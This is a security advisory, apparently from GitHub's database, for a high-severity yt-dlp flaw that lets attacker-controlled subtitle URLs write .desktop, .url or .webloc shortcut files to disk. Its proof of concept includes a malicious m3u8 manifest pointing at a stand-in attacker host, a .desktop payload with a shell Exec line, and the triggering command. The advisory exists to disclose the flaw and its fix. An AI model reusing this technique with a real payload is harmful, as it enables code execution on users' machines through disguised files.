yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)

Description

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server:
Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download:
In this case, the generic extractor triggers the exploit if the --write-subs option is used:

yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Patches

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

  • Only pass fully trusted input URLs to yt-dlp
  • Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
  • Use --format - to interactively select download formats and validate their file extensions

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-06-16 20:59:42 UTC
Updated
2026-06-16 20:59:44 UTC
GitHub reviewed
2026-06-16 20:59:42 UTC

EPSS Score

Score Percentile
0.12% 30.40%

CVSS Scores

Base score Version Severity Vector
8.3 3.1
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:R)
A real person has to do something—click, install, enable—otherwise it doesn’t land.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

CWEs

CWE id Name
CWE-641 Improper Restriction of Names for Files and Other Resources

Credits

  • pavanchow (reporter)
  • Grub4K (remediation_developer)
  • bashonly (remediation_reviewer)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip yt-dlp < 2026.06.09 2026.6.9

References

cvelogic Threat Intelligence